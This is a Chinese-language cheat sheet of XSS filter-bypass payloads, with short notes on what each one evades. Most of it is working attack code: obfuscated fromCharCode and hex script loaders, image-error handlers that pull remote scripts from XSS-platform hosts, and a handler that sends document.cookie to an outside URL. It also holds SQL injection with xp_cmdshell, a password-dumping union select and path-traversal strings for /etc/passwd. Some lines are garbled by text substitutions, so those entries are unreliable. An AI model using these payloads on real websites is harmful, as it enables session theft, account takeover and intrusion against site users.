xss各种绕过收集(更新完毕)
<a href="javascrip:alert(document.cookie)"> 用a标签来弹窗
"><img src="" onerror="document.write(String.fromCharCode(60)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62)+String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(116)+String.fromCharCode(40)+String.fromCharCode(49)+String.fromCharCode(41)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62))"> 在网页过滤了<script和单引号的情况下可以使用代码绕过,上面write中内容输出的结果是<script>alert(1)</script> 如果想缩短,可以把上面的参数合并,像这样:String.fromCharCode(76,90,83,66);
"><meta http-equiv="Refresh" content="0;url=javascript:document.write(String.fromCharCode(60)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99)+String.fromCharCode(61)+String.fromCharCode(120)+String.fromCharCode(120)+String.fromCharCode(120)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62))> 遇到过滤<script>无法调用js的时候也可以用类似的代码突破,上面代码是跳转url到javascript:document.write("<script src=xxx></script>") 也就是调用js文件xxx 如果想缩短,可以把上面的参数合并,像这样:String.fromCharCode(76,90,83,66);
"><iframe src=javascript:alert(document.cookie); height=0 width=0 /> <iframe>弹窗
<img src=x onerror=appendChild(createElement('script')).src='//js地址' /> img标签来收信
<img/**/src=1/**/onerror="with(document)body.appendChild(createElement('script')).src='脚本地址'" /> 过滤了 <script>标签 以及空格 的解决办法
<img src="5" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>
回显是<img src="5" onerror=eval("alert('xss')")></img>
如果你要加载脚本请这样:javascript:document.write(unescape(' <script src="脚本地址"></script>')); 修改好后 进行HEX加密再放入eval
注:第一段代码:首先将要执行的 利用Hex 编码 再img 的错误事件 用eval 函数 操控()内的代码!eval 可以计算 并执行 将上面代码解码后便执行了!
第二段加载脚本的:首先是利用 javascript unescape函数 对()内的HEX编码进行解码 然后再通过document.write 在文档对象上面输入()内的内容!
因为()内的内容以及经过unescape的解码 所以输出来后是正常的 如果没有进行解码 那么你输出来的 将会是hex
在这里没有出现 script等危险标签 也没有单引号 所以成功绕过! 过滤了单引号 以及几个危险标签
<script>document.write(String.fromCharCode(在这里写上你的代码));</script> 过滤了等号 单引号 双引号 空格的绕过方法
<img src=1 onerror=javascript:alert("\x58S\x53\40\x41t\x74\x61\x63\153e\162")> 该过滤的都过滤了
<img src=x onerror=alert(/insight-labs/)>、<p 事件函数 来弹窗
屏蔽了scaript可以把scaript改成sc%0aript来绕过
"h"+"t"+"t"+"p",绕过对http的过滤
'"><script>alert(/1/)</script><a="
'"><script
src=http://x.co/xiHv></script><a="
='><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
%3Cscript%3Ealert('XSS')%3C/script%3E
'"><script
src="//x.co/xiHv"></script><a="
'"><script
src=//xss.tw/2045></script><a="
'"><script
src=//xss.tw/3058></script><a="
<script src=//xss.tw/3058></script>
"
引号
空格
< <
> >
无src 无等号
无引号
"></span><script>document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,120,46,99,111,47,120,105,72,118,62,60,47,115,99,114,105,112,116,62));</script><span>
eval(Dec('203041263543203','2549'));
<div
style="display:none"></div><div style="display:none" t="1"
e="style\/<'"></div>"/
\""/<img src=#
onerror=eval(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,47,47,120,115,115,46,116,119,47,51,48,53,56,62,60,47,115,99,114,105,112,116,62,32));/\>>
<div
id="myxsxxcd" style="color:red;display:none"
title="if(!window.myxsssxx){window.myxsssxx=123;alert(document.cookie);}">
<DIV><A></A>
<STYLE><!--a{<
img
src=</STYLE>;x:expression(eval(myxsxxcd.title));<style>}--></style></DIV>
<td
width="628" background="/img/index2_r7_c2_r1_c5_s1_s1.jpg">
<img
src=x
onerror=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,41,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,46,116,119,47,51,51,56,49,34))>
<img src=x
onerror=eval(String.fromCharCode(document.body.appendChild(createElement("script")).src="http://xss.tw/3381"))>
<img src=x
onerror=document.body.appendChild(createElement('script')).src="javascript:alert(/1/)">
<img src=x
onerror=document.body.appendChild(createElement('script')).src='http://xss8.net/? c=QihaL'>
<p><img
class="reference" contenteditable="false" data-refid="2" data-type="reference"
onerror="eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,41,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,56,46,110,101,116,47,63,99,61,81,105,104,97,76,34))"
src="http://img.baidu.com/img/baike/editor/reference.gif"
unselectable="on"
/></p>
eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,41,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,56,46,110,101,116,47,63,99,61,81,105,104,97,76,34))
<div
class="qm_left" style="position:relative;z-index:2;background:url(//xss.tw/2180)
no-repeat 0
0;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='//xss.tw/2180',sizingMethod='scale');width:40px;height:40px;">
<span
class="qm_ico_print" id="mail_print" title="打印"
onclick="window.open('/cgi-bin/readmail?sid=SC_hEOi3h_nqEgJQ&');"></span>
ECMAScript
v3 已从标准中删除了 unescape() 函数,并反对使用它
因此应该用 decodeURI() 和 decodeURIComponent()
取而代之。
通过找到形式为 %xx 和 %uxxxx 的字符序列(x 表示十六进制的数字)
用 Unicode 字符 \u00xx 和 \uxxxx
替换这样的字符序列进行解码。
解密是unescape('%udcdb%uced3%u8d93%u888a%ud58f%u');
加密是escape('%udcdb%uced3%u8d93%u888a%ud58f%ud4c8%udcd9%ud
');
javascript:document.write(unescape('<script src="http://www.xxxx.com/x.js"></script>'));
document.write(String.fromCharCode(60,12,62));
==== document.write(String.fromCharCode(<script src=http://xss.me/1></script>;));
"></span><script>document.write(http://baidu.com)</script><span>
[email][url][img]http://xxx.com onmouseover=eval(String.fromCharCode(116,114));
[/img][/url][/email]
鼠标单击
<a href="http://www.xyydyt.com"
style="color:#143d70; simsun;"
onclick="alert(/a/);this.style.behavior='url(#default#homepage)';this.setHomePage('http://www.xyydyt.com');
return(false);">asdasdsad</a>
<table
background=”javascript:alert(/xss/)”></table>’/在表格中插入脚本
<>过滤用\x3cscript.
src=http://www.2cto.com /malicious-code.js\x3e\x3c/script\x3e
<script
defer="defer">
var
a,b;
a="/";
b="/x.co/xiHv";
window.open(a+b,"","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=500,height=500");
</script>
<%
string str_a = rrequest.getParameter("a");%>
var a=
<%=str_a%>
document.write(a);
<img
src="123">
a.jsp/<script>alert('Vulnerable')</script>
a/
a?<script>alert('Vulnerable')</script>
"><script>alert('xss')</script>
';exec%20master..xp_cmdshell%20'dir%20
c:%20>%20c:\inetpub\wwwroot\?.txt'--&&
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
%3Cscript%3Ealert(document.
domain);%3C/script%3E&
%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\windows\system.ini
\..\..\..\..\..\..\..\..\windows\system.ini
'';!--"<XSS>=&{()}
<IMG
src="javascript:alert('XSS');">
<IMG
src=javascript:alert('XSS')>
<IMG
src=JaVaScRiPt:alert('XSS')>
<IMG
src=JaVaScRiPt:alert("XSS")>
<IMG
src=javascript:alert('XSS')>
<IMG
src=javascript:alert('XSS')>
<IMG
src=javascript:alert('XSS')>
<sRCIpt>alert(/123/)</ScRpT>
<P><SPAN
class=xmsw title=防火外墙保温材料
onmouseout="window.location='http://www.xfydyt.com'">了解你的产品和行</SPAN></P>
<div
style="background-p_w_picpath:url(<script>alert(document.cookie)</script>)">
<div
style="background-p_w_picpath:url(javascript:alert(document.cookie))">
<div
style="behaviour:url('http://www.how-to-hack.org/exploit.html');">
<div
style="width:expression(alert('x123ss'));">
<img
src="java&#script:alert(/1231/);">
<img
src=javascript:alert(/1231/);>
<img
src="javascript:alert('XSS')">
<IMG
src="jav ascript:alert('XaSS');">
<IMG src="jav
ascript:alert('XbSS');">
<IMG src="jav
ascript:alert('XcSS');">
"<IMG src=java\0script:alert(\"XSS\")>";'
> out
<IMG src="
javascript:alert('XdSS');">
<SCRIPT>a=/XSfS/alert(a.source)</SCRIPT>
<BODY
BACKGROUND="javascript:alert('XeSS')">
<BODY
ONLOAD=alert('XgSS')>
<IMG
DYNSRC="javascript:alert('XhSS')">
<IMG
LOWSRC="javascript:alert('XiSS')">
<BGSOUND
src="javascript:alert('XjSS');">
<span
onclick="javascript:changeFont(2);">
<SPAN class=xmsw title=dd
onmouseout=window.location='http://www,xfydyt.com'>test</span>
<span
class="xmsw" title="dd" onmouseout=window.location='http://test/test.php?c='+document.cookie>test</span>
<SPAN
class=xmsw title=dd
onmouseout=javascript:alert(document.cookie)>test</SPAN>
<br
size="&{alert('XkSS')}">
<LAYER src="http://xss.ha.ckers.org/a.js"></layer>
<LINK
REL="stylesheet" href="javascript:alert('XlSS');">
<IMG
src='vbscript:msgbox("XmSS")'>
<IMG src="mocha:[code]">
<IMG
src="livescript:[code]">
<META HTTP-EQUIV="refresh"
CONTENT="0;url=javascript:alert('XoSS');">
<IFR AME
src=javascript:alert('XSnS')></IFRA ME>
<FRAMESET><FRAME
src=javascript:alert('XpSS')></FRAME></FRAMESET>
<TABLE
BACKGROUND="javascript:alert('XSqS')">
<DIV STYLE="background-p_w_picpath:
url(javascript:alert('X1SS'))">
<DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');">
<DIV
STYLE="width:
expression(alert('X2SS'));">
<STYLE>@im\port'\ja\vasc\ript:alert("X3SS")';</STYLE>
<IMG
STYLE='xss:expre\ssion(alert("X5SS"))'>
<STYLE
TYPE="text/javascript">alert('X4SS');</STYLE>
<STYLE
TYPE="text/css">.XSS{background-p_w_picpath:url("javascript:alert('X6SS')");}</STYLE><A
CLASS=XSS></A>
<STYLE
type="text/css">BODY{background:url("javascript:alert('X7SS')")}</STYLE>
<BASE
href="javascript:alert('X8SS');//">
getURL("javascript:alert('X9SS')")
a="get";b="URL";c="javascript:";d="alert('X10SS');";eval(a+b+c+d);
<XML
src="javascript:alert('X11SS');">
"> <BODY
ONLOAD="a();"><SCRIPT>function
a(){alert('X12SS');}</SCRIPT><"
<SCRIPT src="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>
<IMG
src="javascript:alert('X13SS')"
<!--#exec cmd="/bin/echo '<SCRIPT
SRC'"--><!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>;'"-->
<IMG
src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<SCRIPT
a=">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT
=">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT
a=">" '' src="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT
"a='>'" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT
src="http://xss.ha.ckers.org/a.js"></SCRIPT>
<A
href=http://www.gohttp://www.google.com/ogle.com/>link</A>;
<DIV
STYLE="width:expression(alert('anyunix'));">
<IMG
SRC='vbscript:msgbox("anyunix")'>
<STYLE>width:expression(alert('anyunix'));</STYLE>
(1)普通的XSS
JavaScript注入
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>;
(2)IMG标签XSS使用JavaScript命令
<SCRIPT
SRC=http://3w.org/XSS/xss.js></SCRIPT>;
(3)IMG标签无分号无引号
<IMG
SRC=javascript:alert('XSS')>
(4)IMG标签大小写不敏感
<IMG
SRC=JaVaScRiPt:alert('XSS')>
(5)HTML编码(必须有分号)
<IMG
SRC=javascript:alert("XSS")>
(6)修正缺陷IMG标签
<IMG
"""><SCRIPT>alert("XSS")</SCRIPT>">
(7)formCharCode标签(计算器)
<IMG
SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8)UTF-8的Unicode编码(计算器)
<IMG
SRC=jav..省略..S')>
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
<IMG
SRC=jav..省略..S')>
(10)十六进制编码也是没有分号(计算器)
<IMG
SRC=java..省略..XSS')>
(11)嵌入式标签,将Javascript分开
<IMG
SRC="jav ascript:alert('XSS');">
(12)嵌入式编码标签,将Javascript分开
<IMG
SRC="jav ascript:alert('XSS');">
(13)嵌入式换行符
<IMG SRC="jav
ascript:alert('XSS');">
(14)嵌入式回车
<IMG SRC="jav
ascript:alert('XSS');">
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
<IMG
SRC="javascript:alert('XSS')">
(16)解决限制字符(要求同页面)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+'
src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>
(17)空字符
perl
-e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' >
out
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
perl -e 'print
"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' >
out
(19)Spaces和meta前的IMG标签
<IMG SRC="
javascript:alert('XSS');">
(20)Non-alpha-non-digit
XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21)Non-alpha-non-digit
XSS to 2
<BODY
onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22)Non-alpha-non-digit
XSS to 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23)双开括号
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24)无结束脚本标记(仅火狐等浏览器)
<SCRIPT
SRC=http://3w.org/XSS/xss.js?<B>;
(25)无结束脚本标记2
<SCRIPT
SRC=//3w.org/XSS/xss.js>
(26)半开的HTML/JavaScript XSS
<IMG
SRC="javascript:alert('XSS')"
(27)双开角括号
<iframe src=http://3w.org/XSS.html <
(28)无单引号 双引号
分号
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29)换码过滤的JavaScript
\";alert('XSS');//
(30)结束Title标签
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31)Input
Image
<INPUT SRC="javascript:alert('XSS');">
(32)BODY
Image
<BODY
BACKGROUND="javascript:alert('XSS')">
(33)BODY标签
<BODY('XSS')>
(34)IMG
Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">
(35)IMG
Lowsrc
<IMG
LOWSRC="javascript:alert('XSS')">
(36)BGSOUND
<BGSOUND
SRC="javascript:alert('XSS');">
(37)STYLE sheet
<LINK
REL="stylesheet"
HREF="javascript:alert('XSS');">
(38)远程样式表
<LINK
REL="stylesheet" HREF="http://3w.org/xss.css">
(39)List-style-p_w_picpath(列表式)
<STYLE>li
{list-style-p_w_picpath:
url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40)IMG
VBscript
<IMG
SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS
(41)META链接url
<META
HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
(42)Iframe
<IFRAME
SRC="javascript:alert('XSS');"></IFRAME>
(43)Frame
<FRAMESET><FRAME
SRC="javascript:alert('XSS');"></FRAMESET>
(44)Table
<TABLE
BACKGROUND="javascript:alert('XSS')">
(45)TD
<TABLE><TD
BACKGROUND="javascript:alert('XSS')">
(46)DIV
background-p_w_picpath
<DIV STYLE="background-p_w_picpath:
url(javascript:alert('XSS'))">
(47)DIV
background-p_w_picpath后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
<DIV
STYLE="background-p_w_picpath: url( javascript:alert('XSS'))">
(48)DIV
expression
<DIV STYLE="width:
expression_r(alert('XSS'));">
(49)STYLE属性分拆表达
<IMG
STYLE="xss:expression_r(alert('XSS'))">
(50)匿名STYLE(组成:开角号和一个字母开头)
<XSS
STYLE="xss:expression_r(alert('XSS'))">
(51)STYLE
background-p_w_picpath
<STYLE>.XSS{background-p_w_picpath:url("javascript:alert('XSS')");}</STYLE><A
CLASS=XSS></A>
(52)IMG
STYLE方式
exppression(alert("XSS"))'>
(53)STYLE
background
<STYLE><STYLE
type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54)BASE
<BASE
HREF="javascript:alert('XSS');//">
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
<EMBED
SRC="http://3w.org/XSS/xss.swf"
></EMBED>
(56)在flash中使用ActionScrpt可以混进你XSS的代码
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval_r(a+b+c+d);
(57)XML
namespace.HTC文件必须和你的XSS载体在一台服务器上
<HTML xmlns:xss>
<?import
namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
<SCRIPT
SRC=""></SCRIPT>
(59)IMG嵌入式命令,可执行任意命令
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60)IMG嵌入式命令(a.jpg在同服务器)
Redirect
302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61)绕符号过滤
<SCRIPT
a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT
=">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT
a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT
"a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT
a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT
a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT
SRC="http://3w.org/xss.js"></SCRIPT>
(68)URL绕行
<A
HREF="http://127.0.0.1/">XSS</A>
(69)URL编码
<A
HREF="http://3w.org">XSS</A>
(70)IP十进制
<A
HREF="http://3232235521″>XSS</A>
(71)IP十六进制
<A
HREF="http://0xc0.0xa8.0×00.0×01″>XSS</A>
(72)IP八进制
<A
HREF="http://0300.0250.0000.0001″>XSS</A>
(73)混合编码
<A
HREF="h
tt p://6
6.000146.0×7.147/"">XSS</A>
(74)节省[http:]
<A
HREF="//www.google.com/">XSS</A>
(75)节省[www]
<A HREF="http://google.com/">XSS</A>
(76)绝对点绝对DNS
<A
HREF="http://www.google.com./">XSS</A>
(77)javascript链接
<A
HREF="javascript:document.location='http://www.google.com/'">XSS</A>
Code:
<INPUT TYPE="IMAGE" SRC="javascript:alert(XSS);">
Code: <BODY
BACKGROUND="javascript:alert(XSS)">
Code: <BODY
ONLOAD=alert(XSS)>
Code: <IMG
DYNSRC="javascript:alert(XSS)">
Code: <BGSOUND
SRC="javascript:alert(XSS);">
Code: <BR SIZE="&{alert(XSS)}">
(netspace)
Code: <LINK REL="stylesheet"
HREF="javascript:alert(XSS);">
Code: <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
Code:
<STYLE>@importhttp://ha.ckers.org/xss.css;</STYLE>;
Code: <META
HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>;; REL=stylesheet">
Code:
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
Code:
<XSS STYLE="behavior: url(xss.htc);">
Code: <STYLE>li
{list-style-p_w_picpath:
url("javascript:alert(XSS)");}</STYLE><UL><LI>XSS
Code:
<IMG SRC="mocha:[code]"> (netscape only)
Code: <IMG
SRC="livescript:[code]"> (netscape only)
Code: <TABLE
BACKGROUND="javascript:alert(XSS)">
Code: <IFRAME
SRC="javascript:alert(XSS);"></IFRAME>
Code: <TABLE><TD
BACKGROUND="javascript:alert(XSS)">
Code: <DIV STYLE="background-p_w_picpath:
url(javascript:alert(XSS))">
Code: <BASE
HREF="javascript:alert(XSS);//">
US_ASCII编码(库尔特发现)。使用7位ascii编码代替8位,可以绕过很多过滤。但是必须服务器是以US-ASCII编码交互的。目前仅发现Apache
Tomcat是以该方式交互。
Code:
?scriptualert(EXSSE)?/scriptu
META协议
Code:<META
HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(XSS);">
Code:
<META HTTP-EQUIV="refresh"
CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
Code:
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(XSS);">
对DIV进行unicode编码
Code:
<DIV STYLE="background-p_w_picpath: 075 072 06C 028 06a 061 076 061 073 063 072 069
070 074 03a 061 06c 065 072 074 028.1027 058.1053 053 027 029
029">
使用expression属性
Code: <DIV STYLE="width:
expression(alert(XSS));">
STYLE标签
Code:<STYLE>@importjavasc
ipt:alert("XSS");</STYLE>
Code: <STYLE
TYPE="text/javascript">alert(XSS);</STYLE>
Code:
<STYLE>.XSS{background-p_w_picpath:url("javascript:alert(XSS)");}</STYLE><A
CLASS=XSS></A>
Code: <STYLE
type="text/css">BODY{background:url("javascript:alert(XSS)")}</STYLE>
OBJECT标签
Code:
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
Code:
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param
name=url value=javascript:alert(XSS)></OBJECT>
EMBED标签
Code:
<EMBED SRC="http://ha.ckers.org/xss.swf"
AllowScriptAccess="always"></EMBED>
Code: <EMBED
SRC="data:p_w_picpath/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH
A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv
MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs
aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw
IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh
TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="p_w_picpath/svg+xml"
AllowScriptAccess="always"></EMBED>
在flash文件中使用如下代码:
Code:
a="get";
b="URL("";
c="javascript:";
d="alert(XSS);")";
eval(a+b+c+d);
XML
namespace可以引入行为文件htc但是必须在同一服务器上
Code: <HTML xmlns:xss>
<?import
namespace="xss" implementation="http://ha.ckers.org/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
Xss.htc:
<PUBLIC:COMPONENT TAGNAME="xss">
<PUBLIC:ATTACH
EVENT="ondocumentready" ONEVENT="main()"
LITERALCONTENT="false"/>
</PUBLIC:COMPONENT>
<SCRIPT>
function main()
{
alert("XSS");
}
</SCRIPT>
使用CDATA模糊化的XML数据岛
Cdoe: <XML
ID=I><X><C><![CDATA[<IMG
SRC="javas]]><![CDATA[cript:alert(XSS);">]]>
</C></X></xml><SPAN
DATASRC=#I DATAFLD=C
DATAFORMATAS=HTML></SPAN>
XML数据岛
Code:<XML
ID="xss"><I><B><IMG SRC="javas<!--
-->cript:alert(XSS)
情空收集